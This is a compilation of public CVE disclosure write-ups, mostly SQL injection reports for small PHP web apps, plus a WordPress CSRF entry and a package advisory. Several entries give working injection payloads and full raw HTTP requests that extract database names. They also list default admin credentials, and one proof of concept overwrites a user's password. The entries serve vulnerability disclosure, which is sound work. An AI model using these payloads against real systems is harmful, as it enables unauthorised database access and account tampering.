Helmet Store Showroom Site v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_category.

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

Vulnerability Discoverer: Yang Tao, TBLab of Venustech

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /hss/classes/Master.php?f=delete\_category

Vulnerability location: /hss/classes/Master.php?f=delete\_category,id

dbname =hss\_db,length=6

\[+\] Payload: id=6' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /hss/classes/Master.php?f\=delete\_category HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/hss/admin/?page=categories
Content-Length: 65
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close
id=6' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-46947: bug_report/SQLi-1.md at main · Venus-XATBLab-YT/bug_report

Helmet Store Showroom Site v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_helmet.

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

Vulnerability Discoverer: Yang Tao, TBLab of Venustech

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /hss/classes/Master.php?f=delete\_helmet

Vulnerability location: /hss/classes/Master.php?f=delete\_helmet,id

dbname =hss\_db,length=6

\[+\] Payload: id=2 and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /hss/classes/Master.php?f\=delete\_helmet HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
id=2 and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-46949: bug_report/SQLi-3.md at main · Venus-XATBLab-YT/bug_report

The Mediamatic – Media Library Folders plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.8.1. This is due to missing or incorrect nonce validation on its AJAX actions function. This makes it possible for unauthenticated attackers to change image categories used by the plugin, via forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVE-2023-0294: sidebar.php in mediamatic/trunk/inc – WordPress Plugin Repository

Dynamic Transaction Queuing System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/ajax.php?action=delete_uploads.

**Dynamic Transaction Queuing System v1.0 by oretnom23 has SQL injection**

Vulnerability Discoverer: Yang Tao, TBLab of Venustech

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14479/dynamic-transaction-queuing-system-using-phpmysql-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /queuing/admin/ajax.php?action=delete\_uploads

Vulnerability location: /queuing/admin/ajax.php?action=delete\_uploads, id

dbname =queuing\_db

\[+\] Payload: id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0) // Leak place ---> id

POST /queuing/admin/ajax.php?action\=delete\_uploads HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=t4551shae3529036q2g0j8luub
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 66
id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0)

CVE-2022-46951: bug_report/SQLi-2.md at main · Venus-XATBLab-YT/bug_report

Dynamic Transaction Queuing System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/ajax.php?action=delete_window.

**Dynamic Transaction Queuing System v1.0 by oretnom23 has SQL injection**

Vulnerability Discoverer: Yang Tao, TBLab of Venustech

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14479/dynamic-transaction-queuing-system-using-phpmysql-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /queuing/admin/ajax.php?action=delete\_window

Vulnerability location: /queuing/admin/ajax.php?action=delete\_window, id

dbname =queuing\_db

\[+\] Payload: id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0) // Leak place ---> id

POST /queuing/admin/ajax.php?action\=delete\_window HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=t4551shae3529036q2g0j8luub
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 66
id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0)

CVE-2022-46950: bug_report/SQLi-1.md at main · Venus-XATBLab-YT/bug_report

Dynamic Transaction Queuing System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/manage_user.php.

**Dynamic Transaction Queuing System v1.0 by oretnom23 has SQL injection**

Vulnerability Discoverer: Yang Tao, TBLab of Venustech

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14479/dynamic-transaction-queuing-system-using-phpmysql-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /queuing/admin/manage\_user.php?id=

Vulnerability location: /queuing/admin/manage\_user.php?id=, id

dbname =queuing\_db

\[+\] Payload: /queuing/admin/manage\_user.php?id=-1%20union%20select%201,database(),3,4,5,6--+ // Leak place ---> id

GET /queuing/admin/manage\_user.php?id\=\-1%20union%20select%201,database(),3,4,5,6\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=t4551shae3529036q2g0j8luub
Connection: close

CVE-2022-46956: bug_report/SQLi-5.md at main · Venus-XATBLab-YT/bug_report

Dynamic Transaction Queuing System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/ajax.php?action=save_window.

**Dynamic Transaction Queuing System v1.0 by oretnom23 has SQL injection**

Vulnerability Discoverer: Yang Tao, TBLab of Venustech

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14479/dynamic-transaction-queuing-system-using-phpmysql-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /queuing/admin/ajax.php?action=save\_window

Vulnerability location: /queuing/admin/ajax.php?action=save\_window, id

dbname =queuing\_db

\[+\] Payload: id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0)&transaction\_id=1&name=Window 1 // Leak place ---> id

POST /queuing/admin/ajax.php?action\=save\_window HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=t4551shae3529036q2g0j8luub
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 92
id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0)&transaction\_id=1&name=Window 1

CVE-2022-46953: bug_report/SQLi-4.md at main · Venus-XATBLab-YT/bug_report

Dynamic Transaction Queuing System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/ajax.php?action=delete_user.

**Dynamic Transaction Queuing System v1.0 by oretnom23 has SQL injection**

Vulnerability Discoverer: Yang Tao, TBLab of Venustech

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14479/dynamic-transaction-queuing-system-using-phpmysql-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /queuing/admin/ajax.php?action=delete\_user

Vulnerability location: /queuing/admin/ajax.php?action=delete\_user, id

dbname =queuing\_db

\[+\] Payload: id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0) // Leak place ---> id

POST /queuing/admin/ajax.php?action\=delete\_user HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=t4551shae3529036q2g0j8luub
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 66
id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0)

CVE-2022-46952: bug_report/SQLi-3.md at main · Venus-XATBLab-YT/bug_report

Tramyardg hotel-mgmt-system version 2022.4 is vulnerable to SQL Injection via /app/dao/CustomerDAO.php.

**List of Vulnerable path**

Vulnerable path /app/dao/CustomerDAO.php  
Vulnerable path /app/handlers/CustomerHandler.php  
Vulnerable path /app/process\_update\_profile.php  
Lines 49-59 of the "CustomerDAO.php" file splice the sql word,so bypass the PDO.  
  
Line 98 of the "CustomerHandler.php" use the vulnerable function.  
  
Lines 31-40 of the "process\_update\_profile.php" use the vulnerable function.  

**Vulnerability exploitation process:**

After the user logged in, click the button "update proflie".  
  
Then input the poc and click "update".  
  
After that,refresh it and click "update profile",you can see the data from database.  

**POC code:**

youyou",password = "", phone = concat(database(),version()) WHERE \`customer\`.\`cid\`="10"#

CVE-2022-48090: tramyardg-hotel-mgmt-system of version2022.4 has a SQL injection vulnerability · Issue #21 · tramyardg/hotel-mgmt-system

a12nserver is an open source lightweight OAuth2 server. Users of a12nserver that use MySQL might be vulnerable to SQL injection bugs. If you use a12nserver and MySQL, update as soon as possible. This SQL injection bug might let an attacker obtain OAuth2 Access Tokens for users unrelated to those that permitted OAuth2 clients. The knex dependency has been updated to 2.4.0 in a12nserver 0.23.0. There are no known workarounds.

Moderate

evert published GHSA-crhg-xgrg-vvcc

Jan 12, 2023

**Package**

npm @curveball/a12n-server (npm)

**Affected versions**

<0.23.0 >0.20.0

**Patched versions**

0.23.0

**Description**

**Impact**

Users of a12nserver that use MySQL might be vulnerable to SQL injection bugs.

If you use a12nserver and MySQL, update as soon as possible. This SQL injection bug might let an attacker obtain OAuth2 Access Tokens for users unrelated to those that permitted OAuth2 clients.

**Patches**

The knex dependency has been updated to 2.4.0 in a12nserver 0.23.0

**Workarounds**

No further workarounds

**References**

*   knex/knex#1227
*   https://nvd.nist.gov/vuln/detail/CVE-2016-20018
*   https://www.ghostccamm.com/blog/knex\_sqli/

**Severity**

Moderate

6.5

/ 10

**CVSS base metrics**

Attack vector

Network

Attack complexity

Low

Privileges required

High

User interaction

None

Scope

Unchanged

Confidentiality

High

Integrity

High

Availability

None

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N

**CVE ID**

CVE-2023-22494

**Weaknesses**

CWE-89

Tag

#sql